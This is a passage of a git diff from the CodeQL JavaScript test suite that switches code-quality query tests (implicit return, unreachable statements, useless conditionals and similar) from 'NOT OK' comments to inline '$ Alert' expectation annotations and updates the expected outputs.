implicitly return 'undefined' here, while $@ an explicit value is returned. | tst.js:98:9:101:1 | functio ... true;\\n} | Function u | tst.js:100:3:100:14 | return true; | elsewhere | +| tst.js:104:2:104:18 | if (b) ... turn 1; | $@ may implicitly return 'undefined' here, while $@ an explicit value is returned. | tst.js:103:1:106:1 | functio ... rn 1;\\n} | Function v | tst.js:105:3:105:11 | return 1; | elsewhere | diff --git a/javascript/ql/test/query-tests/Statements/ImplicitReturn/ImplicitReturn.qlref b/javascript/ql/test/query-tests/Statements/ImplicitReturn/ImplicitReturn.qlref index bcfdc72cc5d5..aa8e305805b5 100644 --- a/javascript/ql/test/query-tests/Statements/ImplicitReturn/ImplicitReturn.qlref +++ b/javascript/ql/test/query-tests/Statements/ImplicitReturn/ImplicitReturn.qlref @@ -1 +1,2 @@ -Statements/ImplicitReturn.ql \ No newline at end of file +query: Statements/ImplicitReturn.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js b/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js index 114db4ed8d3e..a579d1a54139 100644 --- a/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js +++ b/javascript/ql/test/query-tests/Statements/ImplicitReturn/tst.js @@ -1,17 +1,16 @@ -// NOT OK function f() { - if (foo()) + if (foo()) // $ Alert return true; } -// OK + function g() { if (foo()) return true; return false; } -// OK + function h() { open(); try { @@ -21,7 +20,7 @@ function h() { } } -// OK + function k(x) { switch (x) { case 1: @@ -31,20 +30,20 @@ function k(x) { } } -// OK + function l() { return 23; alert("Hi"); } -// OK + function m() { if (foo()) return true; throw new Error("not foo!"); } -// OK + function n() { if (foo()) return true; @@ -60,7 +59,7 @@ function foo() { } // -// OK: dual-use constructor +// OK - dual-use constructor function Point(x, y) { if (!(this instanceof Point)) return new Point(x, y); @@ -68,7 +67,7 @@ function Point(x, y) { this.y = y; } -// OK: infinite loops +// OK - infinite loops function q(n) { for (var i=0;;++i) if (i>2*n) @@ -96,14 +95,12 @@ function t(n) { } while("true"); } -// NOT OK var u = function() { - if (foo()) + if (foo()) // $ Alert return true; }; -// NOT OK function v(b) { - if (b) + if (b) // $ Alert return 1; } diff --git a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/InconsistentLoopOrientation.expected b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/InconsistentLoopOrientation.expected index e3c5ac0b71d8..682ff7b23eda 100644 --- a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/InconsistentLoopOrientation.expected +++ b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/InconsistentLoopOrientation.expected @@ -1,3 +1,3 @@ -| tst.js:6:1:7:1 | for (j ... -j) {\\n} | This loop counts downward, but its variable is bounded upward. | -| tst.js:10:1:11:1 | for (va ... ++) {\\n} | This loop counts upward, but its variable is bounded downward. | -| tst.js:18:1:19:13 | for (i= ... i] = 0; | This loop counts downward, but its variable is bounded upward. | +| tst.js:5:1:6:1 | for (j ... -j) {\\n} | This loop counts downward, but its variable is bounded upward. | +| tst.js:8:1:9:1 | for (va ... ++) {\\n} | This loop counts upward, but its variable is bounded downward. | +| tst.js:15:1:16:13 | for (i= ... i] = 0; | This loop counts downward, but its variable is bounded upward. | diff --git a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/InconsistentLoopOrientation.qlref b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/InconsistentLoopOrientation.qlref index 8b296cfb160f..7a60789bb92b 100644 --- a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/InconsistentLoopOrientation.qlref +++ b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/InconsistentLoopOrientation.qlref @@ -1 +1,2 @@ -Statements/InconsistentLoopOrientation.ql \ No newline at end of file +query: Statements/InconsistentLoopOrientation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js index f2331a705bdf..8172c8fbcb0f 100644 --- a/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js +++ b/javascript/ql/test/query-tests/Statements/InconsistentLoopOrientation/tst.js @@ -1,19 +1,16 @@ -// OK + for (j = i - 1; j >= 0; --j) { } -// NOT OK for (j = i + 1; j < strLength; --j) { -} +} // $ Alert -// NOT OK for (var i = 0, l = c.length; i > l; i ++) { -} +} // $ Alert + -// OK for (i=lower-1; i>=0; --i) a[i] = 0; -// NOT OK for (i=upper+1; i if (x > 0) x--; - x--; + x--; // $ Alert diff --git a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js index 11cc92b5b27a..f23767bfe19a 100644 --- a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js +++ b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js @@ -1,7 +1,7 @@ function bad1() { if (cond()) f(); - g(); + g(); // $ Alert } function good1() { @@ -22,7 +22,7 @@ function bad2() { f(); else g(); - h(); + h(); // $ Alert } function good3() { @@ -34,7 +34,7 @@ function good3() { function wbad1() { while (cond()) f(); - g(); + g(); // $ Alert } function wgood1() { diff --git a/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/NestedLoopsSameVariable.expected b/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/NestedLoopsSameVariable.expected index 3b56bbcfc44a..c3b55f37146e 100644 --- a/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/NestedLoopsSameVariable.expected +++ b/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/NestedLoopsSameVariable.expected @@ -1 +1 @@ -| tst.js:3:16:3:18 | i>5 | Nested for statement uses loop variable $@ of enclosing $@. | tst.js:3:23:3:23 | i | i | tst.js:1:1:9:1 | for (va ... , k);\\n} | for statement | +| tst.js:2:16:2:18 | i>5 | Nested for statement uses loop variable $@ of enclosing $@. | tst.js:2:23:2:23 | i | i | tst.js:1:1:8:1 | for (va ... , k);\\n} | for statement | diff --git a/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/NestedLoopsSameVariable.qlref b/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/NestedLoopsSameVariable.qlref index 65fe990bb6ee..a8d6bf7f1675 100644 --- a/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/NestedLoopsSameVariable.qlref +++ b/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/NestedLoopsSameVariable.qlref @@ -1 +1,2 @@ -Statements/NestedLoopsSameVariable.ql \ No newline at end of file +query: Statements/NestedLoopsSameVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/tst.js b/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/tst.js index bd82aad01997..37ed9bcc7a39 100644 --- a/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/tst.js +++ b/javascript/ql/test/query-tests/Statements/NestedLoopsSameVariable/tst.js @@ -1,9 +1,8 @@ for (var i=0; i<10; ++i) { - // NOT OK - for (var j=i; i>5; --i) + for (var j=i; i>5; --i) // $ Alert f(i, j); - // OK + for (var k=0; k - +
    diff --git a/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.js b/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.js index d94b71c8ab71..3e06b6ce43e2 100644 --- a/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.js +++ b/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.js @@ -1,2 +1 @@ -// NOT OK -return 42; \ No newline at end of file +return 42; // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/SuspiciousUnusedLoopIterationVariable.expected b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/SuspiciousUnusedLoopIterationVariable.expected index 3a9418b5d9ed..218e141aff4a 100644 --- a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/SuspiciousUnusedLoopIterationVariable.expected +++ b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/SuspiciousUnusedLoopIterationVariable.expected @@ -1,4 +1,4 @@ -| tst.js:4:7:4:11 | let x | For loop variable x is not used in the loop body. | -| tst.js:138:6:138:23 | const [key, value] | For loop variable value is not used in the loop body. | -| tst.js:151:6:151:35 | const [ ... value] | For loop variable value is not used in the loop body. | -| tst.js:152:6:152:10 | let i | For loop variable i is not used in the loop body. | +| tst.js:3:7:3:11 | let x | For loop variable x is not used in the loop body. | +| tst.js:136:6:136:23 | const [key, value] | For loop variable value is not used in the loop body. | +| tst.js:148:6:148:35 | const [ ... value] | For loop variable value is not used in the loop body. | +| tst.js:149:6:149:10 | let i | For loop variable i is not used in the loop body. | diff --git a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/SuspiciousUnusedLoopIterationVariable.qlref b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/SuspiciousUnusedLoopIterationVariable.qlref index e6317f67d4b4..77831cc4eb34 100644 --- a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/SuspiciousUnusedLoopIterationVariable.qlref +++ b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/SuspiciousUnusedLoopIterationVariable.qlref @@ -1 +1,2 @@ -Statements/SuspiciousUnusedLoopIterationVariable.ql +query: Statements/SuspiciousUnusedLoopIterationVariable.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js index f06c40664654..6deedccfd340 100644 --- a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js +++ b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js @@ -1,13 +1,12 @@ -// BAD function countOccurrences(xs, p) { var count = 0; - for (let x of xs) + for (let x of xs) // $ Alert if (p()) ++count; return count; } -// OK + function countOccurrences(xs, p) { var count = 0; for (let x of xs) @@ -16,7 +15,7 @@ function countOccurrences(xs, p) { return count; } -// OK + function countOccurrences(xs, p) { var count = 0; for (let unused of xs) @@ -25,14 +24,14 @@ function countOccurrences(xs, p) { return count; } -// OK + function isEmpty(o) { for (var x in o) return false; return true; } -// OK + function getNumElt(o) { var count = 0; for (var x of o) @@ -40,7 +39,7 @@ function getNumElt(o) { return count; } -// OK + function getNumElt(o) { var count = 0; for (var x of o) { @@ -49,7 +48,7 @@ function getNumElt(o) { return count; } -// OK + function getNumElt(o) { var count = 0; for (var x of o) @@ -57,7 +56,7 @@ function getNumElt(o) { return count; } -// OK + function getNumElt(o) { var count = 0; for (var x of o) @@ -65,7 +64,7 @@ function getNumElt(o) { return count; } -// OK + function getNumElt(o) { var count = 0; for (var x of o) { @@ -75,7 +74,7 @@ function getNumElt(o) { return count; } -// OK + function f(o) { for (var p in o) (function() { @@ -83,20 +82,20 @@ function f(o) { })(); } -// OK + function lastProp(o) { var key; for (key in obj); return key; } -// OK + function g() { for (var unused in {"toString": null}) hasDontEnumBug = false; } -// OK + function is_empty(obj) { var empty = true; for (var key in obj) { @@ -106,7 +105,7 @@ function is_empty(obj) { return empty; } -// OK + function f(objs) { var non_empties = 0; for (var obj in objs) { @@ -118,7 +117,7 @@ function f(objs) { return non_empties; } -// OK: dead loops are not flagged +// OK - dead loops are not flagged function countOccurrencesDead(xs, p) { return; var count = 0; @@ -134,19 +133,17 @@ function countOccurrencesDead(xs, p) { } }); -// NOT OK -for (const [key, value] of array) {} +for (const [key, value] of array) {} // $ Alert -// OK: for array-destructurings we only flag the last element +// OK - for array-destructurings we only flag the last element for (const [key, value] of array) { console.log(value) } -// OK: for array-destructurings we only flag the last element +// OK - for array-destructurings we only flag the last element for (const [key, key2, key3, value] of array) { console.log(value) } -// NOT OK -for (const [key, key2, key3, value] of array) {} -for (let i of [1, 2]) {} \ No newline at end of file +for (const [key, key2, key3, value] of array) {} // $ Alert +for (let i of [1, 2]) {} // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/UnreachableStatement/UnreachableStatement.qlref b/javascript/ql/test/query-tests/Statements/UnreachableStatement/UnreachableStatement.qlref index 1751a9ed7a25..ef8e535dac61 100644 --- a/javascript/ql/test/query-tests/Statements/UnreachableStatement/UnreachableStatement.qlref +++ b/javascript/ql/test/query-tests/Statements/UnreachableStatement/UnreachableStatement.qlref @@ -1 +1,2 @@ -Statements/UnreachableStatement.ql \ No newline at end of file +query: Statements/UnreachableStatement.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js b/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js index 446e51ede1e4..a0a7ddf33416 100644 --- a/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js +++ b/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js @@ -2,7 +2,7 @@ function f() { return 23; - var a = 42; + var a = 42; // $ Alert } function g(x) { @@ -35,7 +35,7 @@ function k() { } throw new Error(); -f(); +f(); // $ Alert function l(x) { switch(x) { @@ -60,7 +60,7 @@ function m(x) { if (true) x; else - y; + y; // $ Alert function f(){ if (x) { diff --git a/javascript/ql/test/query-tests/Statements/UnreachableStatement/typealias.ts b/javascript/ql/test/query-tests/Statements/UnreachableStatement/typealias.ts index 35ce5c6692ba..66eabeb7f073 100644 --- a/javascript/ql/test/query-tests/Statements/UnreachableStatement/typealias.ts +++ b/javascript/ql/test/query-tests/Statements/UnreachableStatement/typealias.ts @@ -1,5 +1,5 @@ export function foo(x: number): number { let y : A = x; return y; - type A = number; // OK. + type A = number; } diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/UseOfReturnlessFunction.qlref b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/UseOfReturnlessFunction.qlref index 99db4d93c30a..766afa541076 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/UseOfReturnlessFunction.qlref +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/UseOfReturnlessFunction.qlref @@ -1 +1,2 @@ -Statements/UseOfReturnlessFunction.ql \ No newline at end of file +query: Statements/UseOfReturnlessFunction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.html b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.html index b8a041b65517..63c77ef3f76b 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.html +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.html @@ -16,6 +16,6 @@     Foo
    Click me
    -
    Click me
    +
    Click me
    \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js index 7b9968115f5e..37da0c7e2a6a 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js @@ -17,17 +17,17 @@ console.log(returnsValue()) console.log(stub()) - console.log(onlySideEffects()); // Not OK! + console.log(onlySideEffects()); // $ Alert - var a = Math.random() > 0.5 ? returnsValue() : onlySideEffects(); // OK! A is never used. + var a = Math.random() > 0.5 ? returnsValue() : onlySideEffects(); // OK - A is never used. - var b = onlySideEffects(); + var b = onlySideEffects(); // $ Alert console.log(b); - var c = 42 + (onlySideEffects(), 42); // OK, value is thrown away. + var c = 42 + (onlySideEffects(), 42); // OK - value is thrown away. console.log(c); - var d = 42 + (42, onlySideEffects()); // NOT OK! + var d = 42 + (42, onlySideEffects()); // $ Alert console.log(d); if (onlySideEffects()) { @@ -42,7 +42,7 @@ onlySideEffects: onlySideEffects } - var e = myObj.onlySideEffects.apply(this, arguments); // NOT OK! + var e = myObj.onlySideEffects.apply(this, arguments); // $ MISSING: Alert console.log(e); function onlySideEffects2() { @@ -50,11 +50,11 @@ } var bothOnlyHaveSideEffects = Math.random() > 0.5 ? onlySideEffects : onlySideEffects2; - var f = bothOnlyHaveSideEffects(); // NOT OK! + var f = bothOnlyHaveSideEffects(); // $ Alert console.log(f); var oneOfEach = Math.random() > 0.5 ? onlySideEffects : returnsValue; - var g = oneOfEach(); // OK + var g = oneOfEach(); console.log(g); function alwaysThrows() { @@ -66,28 +66,28 @@ throw new Error("Important error!") } - var h = returnsValue() || alwaysThrows(); // OK! + var h = returnsValue() || alwaysThrows(); console.log(h); function equals(x, y) { return x === y; } - var foo = [1,2,3].filter(n => {equals(n, 3)}) // NOT OK! + var foo = [1,2,3].filter(n => {equals(n, 3)}) // $ Alert console.log(foo); import { filter } from 'lodash' - var bar = filter([1,2,4], x => { equals(x, 3) } ) // NOT OK! + var bar = filter([1,2,4], x => { equals(x, 3) } ) // $ Alert console.log(bar); - var baz = [1,2,3].filter(n => {n === 3}) // OK + var baz = [1,2,3].filter(n => {n === 3}) console.log(baz); class Deferred { } - new Deferred().resolve(onlySideEffects()); // OK + new Deferred().resolve(onlySideEffects()); Promise.all([onlySideEffects(), onlySideEffects()]) })(); @@ -104,16 +104,16 @@ class Foo { class Bar extends Foo { constructor() { - console.log(super()); // OK. + console.log(super()); } } () => { let equals = (x, y) => { return x === y; }; - var foo = [1,2,3].findLastIndex(n => { equals(n, 3); }) // NOT OK + var foo = [1,2,3].findLastIndex(n => { equals(n, 3); }) // $ Alert console.log(foo); - var foo = [1,2,3].findLast(n => { equals(n, 3); }) // NOT OK + var foo = [1,2,3].findLast(n => { equals(n, 3); }) // $ Alert console.log(foo); } diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts index 6da3bde4bf01..758b4480c64e 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts +++ b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst2.ts @@ -3,4 +3,4 @@ declare function returnsSomething(): number; console.log(returnsSomething()); -console.log(returnsVoid()); // NOT OK! \ No newline at end of file +console.log(returnsVoid()); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/UselessComparisonTest.qlref b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/UselessComparisonTest.qlref index ade7e7d0607e..d75778a10b0b 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/UselessComparisonTest.qlref +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/UselessComparisonTest.qlref @@ -1 +1,2 @@ -Statements/UselessComparisonTest.ql +query: Statements/UselessComparisonTest.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js index aa5ee0e1fb5b..dd0468451930 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/constant.js @@ -1,4 +1,4 @@ function f() { - if (1 > 2) {} else {} // NOT OK - always false - if (1 > 0) {} else {} // NOT OK - always true + if (1 > 2) {} else {} // $ Alert - always false + if (1 > 0) {} else {} // $ Alert - always true } diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js index a40fc483a06c..f16d5a000a22 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/defaults.js @@ -1,11 +1,11 @@ function defaultParam(param = 0) { - if (param > 0) {} // OK + if (param > 0) {} } function defaultPattern(obj, arr) { let { prop = 0 } = obj; - if (prop > 0) {} // OK + if (prop > 0) {} let [ elm = 0 ] = arr; - if (elm > 0) {} // OK + if (elm > 0) {} } diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js index 53496ce2e4ef..cf0c23603e2a 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js @@ -5,7 +5,7 @@ function findValue(values, x, start, end) { return i; } } - if (i < end) { + if (i < end) { // $ Alert return i; } return -1; diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js index 7e198d0e0293..a8064ae69429 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/implicitReturn.js @@ -2,5 +2,5 @@ function test() { let x = (function() { if (g) return 5; })(); - if (x + 1 < 5) {} // OK + if (x + 1 < 5) {} } diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js index 4cc1fd775a43..58b9232cc161 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js @@ -5,6 +5,6 @@ }); (function(){ - (function (i) { if (i == 100000) return; })(1); - (function f(i) { if (i == 100000) return; f(i+1); })(1); + (function (i) { if (i == 100000) return; })(1); // $ Alert + (function f(i) { if (i == 100000) return; f(i+1); })(1); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js index fe4bb6486ce0..edba36470508 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js @@ -2,35 +2,35 @@ function getLastLine(input) { var lines = [], nextLine; while ((nextLine = readNextLine(input))) lines.push(nextLine); - if (!lines) + if (!lines) // $ Alert throw new Error("No lines!"); return lines[lines.length-1]; } function lookup(cache, k) { var v; - return k in cache ? cache[k] : (v = new Entry(recompute())) && (cache[k] = v); + return k in cache ? cache[k] : (v = new Entry(recompute())) && (cache[k] = v); // $ Alert } function test(a, b) { if (!a && !b) { - if (a); - if (b); + if (a); // $ Alert + if (b); // $ Alert } if (!(a || b)) { - if (a); - if (b); + if (a); // $ Alert + if (b); // $ Alert } var x = new X(); - if(x){} - if (new X()){} - if((x)){} - if(((x))){} - if ((new X())){} + if(x){} // $ Alert + if (new X()){} // $ Alert + if((x)){} // $ Alert + if(((x))){} // $ Alert + if ((new X())){} // $ Alert x = 0n; - if (x) // NOT OK + if (x) // $ Alert ; } @@ -40,7 +40,7 @@ async function awaitFlow(){ if (y) v = await f() - if (v) { // OK + if (v) { } } @@ -51,92 +51,92 @@ async function awaitFlow(){ var known = knownF(); if (known) return; - if (known) + if (known) // $ Alert return; var unknown = unknownF(); if (unknown) return; - if (unknown) // NOT OK + if (unknown) // $ Alert return; }); (function (...x) { - x || y // NOT OK + x || y // $ Alert }); (function() { function f1(x) { - x || y // NOT OK, but whitelisted + x || y // OK } f1(true); function f2(x) { while (true) - x || y // NOT OK + x || y // $ Alert } f2(true); function f3(x) { (function(){ - x || y // NOT OK, but whitelisted + x || y // OK }); } f3(true); }); (function() { - if ((x, true)); + if ((x, true)); // $ Alert }); (function (x, y) { if (!x) { - while (x) { // NOT OK + while (x) { // $ Alert f(); } - while (true) { // OK + while (true) { break; } - if (true && true) {} // NOT OK - if (y && x) {} // NOT OK - if (y && (x)) {} // NOT OK - do { } while (x); // NOT OK + if (true && true) {} // $ Alert + if (y && x) {} // $ Alert + if (y && (x)) {} // $ Alert + do { } while (x); // $ Alert } }); (function(x,y) { - let obj = (x && {}) || y; // OK - if ((x && {}) || y) {} // NOT OK + let obj = (x && {}) || y; + if ((x && {}) || y) {} // $ Alert }); (function(){ function constantFalse1() { return false; } - if (constantFalse1()) // OK + if (constantFalse1()) return; function constantFalse2() { return false; } let constantFalse = unknown? constantFalse1 : constantFalse2; - if (constantFalse2()) // OK + if (constantFalse2()) return; function constantUndefined() { return undefined; } - if (constantUndefined()) // NOT OK + if (constantUndefined()) // $ Alert return; function constantFalseOrUndefined1() { return unknown? false: undefined; } - if (constantFalseOrUndefined1()) // NOT OK + if (constantFalseOrUndefined1()) // $ Alert return; let constantFalseOrUndefined2 = unknown? constantFalse1 : constantUndefined; - if (constantFalseOrUndefined2()) // NOT OK + if (constantFalseOrUndefined2()) // $ Alert return; }); @@ -145,12 +145,12 @@ async function awaitFlow(){ function p() { return {}; } - if (p()) { // NOT OK + if (p()) { // $ Alert } var v = p(); - if (v) { // NOT OK + if (v) { // $ Alert } - if (v) { // NOT OK, but not detected due to SSA limitations + if (v) { // $ MISSING: Alert - due to SSA limitations } }); @@ -160,12 +160,12 @@ async function awaitFlow(){ if (e) return e; throw new Error(); } - if(findOrThrow()){ // NOT OK + if(findOrThrow()){ // $ Alert } var v = findOrThrow(); - if (v) { // NOT OK + if (v) { // $ Alert } - if (v) { // NOT OK, but not detected due to SSA limitations + if (v) { // $ MISSING: Alert - due to SSA limitations } }); @@ -173,14 +173,14 @@ async function awaitFlow(){ function f(){ return { v: unkown };} f(); var { v } = f(); - if (v) { // OK + if (v) { } }); (function() { function outer(x) { addEventListener("click", () => { - if (!x && something()) { // NOT OK, but whitelisted + if (!x && something()) { // OK something(); } }); diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.qlref b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.qlref index d29916245d6e..85ffff223221 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.qlref +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.qlref @@ -1 +1,2 @@ -Statements/UselessConditional.ql \ No newline at end of file +query: Statements/UselessConditional.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js index 7b3888c982a4..74e2c0f2439f 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditionalGood.js @@ -11,90 +11,90 @@ function getLastLine(input) { function f1() { return false } - if(f1()){} // OK, whitelisted + if(f1()){} // OK - whitelisted function f2() { return false } - if(!f2()){} // OK, whitelisted + if(!f2()){} // OK - whitelisted function f3() { return false } - if(!!f3()){} // OK, whitelisted + if(!!f3()){} // OK - whitelisted function f4() { return false } - if(f4() || o.p){} // OK, whitelisted + if(f4() || o.p){} // OK - whitelisted function f5() { return false } var v5 = f5(); - if(v5){} // OK, whitelisted + if(v5){} // OK - whitelisted function f6() { return false } var v6 = f6(); - if(!!v6){} // OK, whitelisted + if(!!v6){} // OK - whitelisted })(); (function tooGeneralFunctions(){ function f1(x) { - if(x){} // OK, whitelisted + if(x){} // OK - whitelisted } f1(undefined); f1({}); function f2(x) { - if(x){} // OK, whitelisted + if(x){} // OK - whitelisted } f2(undefined); function f3(x1) { var x2 = x1; - if(x2){} // NOT OK, not whitelisted + if(x2){} // $ Alert - not whitelisted } f3(undefined); function f4(x) { - if(x && o.p){} // OK, whitelisted + if(x && o.p){} // OK - whitelisted } f4(undefined); function f5(x, y) { var xy = o.q? x: y; - if(xy && o.p){} // NOT OK, not whitelisted + if(xy && o.p){} // $ Alert - not whitelisted } f5(undefined, undefined); function f6(x) { - if(!x){} // OK, whitelisted + if(!x){} // OK - whitelisted } f6(true); function f7(x) { - if(!!x){} // OK, whitelisted + if(!!x){} // OK - whitelisted } f7(true); function f8(x, y) { var xy = x || y; - if(xy){} // NOT OK, not whitelisted + if(xy){} // $ Alert - not whitelisted } f8(undefined, undefined); function f9(x, y) { var xy = !x || y; - if(xy){} // OK, whitelisted + if(xy){} // OK - whitelisted } f9(undefined, undefined); function f10(x, y) { var xy = !!x || y; - if(xy){} // NOT OK, not whitelisted + if(xy){} // $ Alert - not whitelisted } f10(undefined, undefined); @@ -103,7 +103,7 @@ function getLastLine(input) { (function(){ function g(p) { return function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted g(p); } }; @@ -111,7 +111,7 @@ function getLastLine(input) { function f(p = false) { return function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted f(p); } }; @@ -119,7 +119,7 @@ function getLastLine(input) { function h(p = false) { (function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted } }); diff --git a/javascript/ql/test/query-tests/Vue/ArrowMethodOnVueInstance.qlref b/javascript/ql/test/query-tests/Vue/ArrowMethodOnVueInstance.qlref index 1203930af866..71d385452e8f 100644 --- a/javascript/ql/test/query-tests/Vue/ArrowMethodOnVueInstance.qlref +++ b/javascript/ql/test/query-tests/Vue/ArrowMethodOnVueInstance.qlref @@ -1 +1,2 @@ -Vue/ArrowMethodOnVueInstance.ql \ No newline at end of file +query: Vue/ArrowMethodOnVueInstance.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Vue/tst.js b/javascript/ql/test/query-tests/Vue/tst.js index 27fe31488cbf..f0889596112a 100644 